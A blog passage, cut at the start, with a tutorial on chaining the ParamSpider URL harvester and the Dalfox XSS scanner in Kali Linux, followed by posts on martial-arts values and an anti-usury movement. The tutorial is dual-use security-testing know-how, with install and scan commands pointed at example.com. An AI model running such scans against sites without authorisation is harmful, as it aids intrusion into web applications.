vulnerabilities and enhance the security posture of their sites.

Thanks to: Ketapang Cyber Team

Combining ParamSpider and Dalfox in Kali Linux

Mon, 01 Jul 2024 03:40:19 GMT

In the ever-evolving world of cybersecurity, staying a step ahead of potential vulnerabilities is crucial. Kali Linux, renowned for its robust suite of security tools, provides a perfect environment for this purpose. This comprehensive guide explores the integration of two powerful tools, ParamSpider and Dalfox, to enhance security testing. We’ll cover installation, setup, and a practical use case to demonstrate how these tools can be used together to identify and exploit security vulnerabilities in web applications.

Introduction to ParamSpider and Dalfox

ParamSpider is a tool designed to find parameter URLs from web archives of the target domain, which are often overlooked but can be potential hotspots for security breaches. It is particularly useful for gathering URLs with parameters for Open Redirection, SSRF, and SQL Injection tests.

Dalfox is an efficient and powerful XSS (Cross-Site Scripting) scanning tool and parameter analysis tool. It helps in finding XSS vulnerabilities in web applications, a critical aspect of web security.

Setting Up the Environment

Before diving into the actual integration and usage of ParamSpider and Dalfox, it is essential to set up the environment in Kali Linux. This involves installing the necessary dependencies and ensuring the tools are properly configured.

Step 1: Gaining Root Access

Start by opening your terminal in Kali Linux and entering the superuser mode to ensure that all operations can be performed with administrative privileges:

sudo su

Step 2: Installing and Setting Up ParamSpider

Clone the ParamSpider repository from GitHub, navigate into the directory, and install it using Python’s pip installer:

git clone https://github.com/devanshbatham/ParamSpider cd ParamSpider pip install .

Once the installation is complete, you can start using ParamSpider to find URLs with parameters. For demonstration, we’ll scan the example domain example.com:

paramspider -d example.com

This command instructs ParamSpider to crawl the specified domain and list out URLs containing parameters, which are crucial for further testing.

Step 3: Installing and Configuring Dalfox

Now, turn your attention to Dalfox. Begin by cloning the Dalfox repository and installing it using Go:

git clone https://github.com/hahwul/dalfox
go install github.com/hahwul/dalfox/v2@latest

After the installation, move the Dalfox executable to a location in your system’s PATH to make it accessible system-wide:

cd go/bin
cp dalfox /usr/bin

Verify the installation by running:

dalfox -h

This command displays help and all available commands in Dalfox, indicating a successful installation.

Step 4: Integrating ParamSpider with Dalfox

With both tools installed, the next step involves leveraging the output from ParamSpider as input for Dalfox. This integration allows for a seamless transition from finding potentially vulnerable parameters to testing them for XSS vulnerabilities.

After running ParamSpider, you should have a file containing discovered URLs with parameters. Use this file as input for Dalfox:

dalfox file /ParamSpider/results/example.com.txt

This command instructs Dalfox to scan each URL found in the output file from ParamSpider for XSS vulnerabilities.

Conclusion

Combining ParamSpider and Dalfox in Kali Linux provides a powerful methodology for uncovering and exploiting security vulnerabilities in web applications. By first identifying URLs with potential vulnerabilities using ParamSpider and then testing them with Dalfox, security professionals can effectively enhance their web application security testing processes.

This guide not only walks you through the installation and setup of both tools but also demonstrates their practical use. With these tools, you can significantly bolster your security testing capabilities, ensuring more secure applications in a world where cyber threats are constantly evolving.

The Value of Martial Arts in Work

Tue, 26 Sep 2023 07:08:25 GMT

I have studied several martial arts disciplines. Starting from Karate, Pagar Nusa, Wushu, to Boxing (self-taught). There are many values emphasized there, one of which is the teaching of being a humble person.

Study real combat to avoid fighting as much as possible. Except in urgent matters or to protect other people, whether yourself, family, friends or even society. The more you practice hitting, the more afraid you will become of hitting.

There are many self-defense values that are applied at work, starting from honesty, courage and a sense of responsibility. Work hard until you are able to work smart by combining the two. Without fear, fight injustice loudly and do not underestimate any job as long as it is obtained in the right way (halal).

The purpose of being a strong person is to protect the weak. Instead of taking material from illegal methods, be it fraud, corruption, usury, and various other forms of crime. This includes helping people who do this, because it falls into the category of helping bad things.

From Corporate Insider to Change Agent (Anti-Usury)

Sat, 16 Sep 2023 00:00:01 GMT

In this captivating journey, I transitioned from being a data engineer and trusted ally of bank executives to becoming a change agent dedicated to promoting ethical financial practices. Recognizing the detrimental impact of usury, which is condemned by various religions, including Christianity, Judaism, and Islam, I chose to redirect my skills towards a greater purpose.

Usury, defined as the practice of unethical or immoral monetary lending that unjustly benefits the lender, poses a grave threat to society. It takes advantage of individuals’ misfortunes and perpetuates an unjust financial system. As I delved deeper into the consequences of usury, I realized the urgent need to raise awareness and foster meaningful change.

Inspired by my background in data engineering and hacking proficiency, I embarked on a mass movement known as the “Anti-Usury Zone.” With the aid of modern tools like ChatGPT, I could swiftly create and disseminate valuable content to educate the public about the dangers of usury.

Joining forces with like-minded individuals, we strive to create a society that rejects exploitative lending practices. Our mission is to empower communities, ensuring they understand the perils of usury and the importance of ethical financial decisions. By embracing the Anti-Usury Zone movement, we challenge the existing financial paradigms and advocate for fair, transparent, and moral practices.

As a change agent, I believe in the power of education and raising awareness. Through this post, I hope to inspire others to question the moral implications of their work and redirect their skills toward promoting a just and equitable society.

For more information and references on usury and its impact, I recommend exploring reputable sources such as religious texts, scholarly articles, and ethical finance publications. These sources can provide deeper insights into the moral and legal implications of usury and the need for reform.

Remember, together we can break free from the chains of usury and forge a path towards a more ethical and compassionate financial system.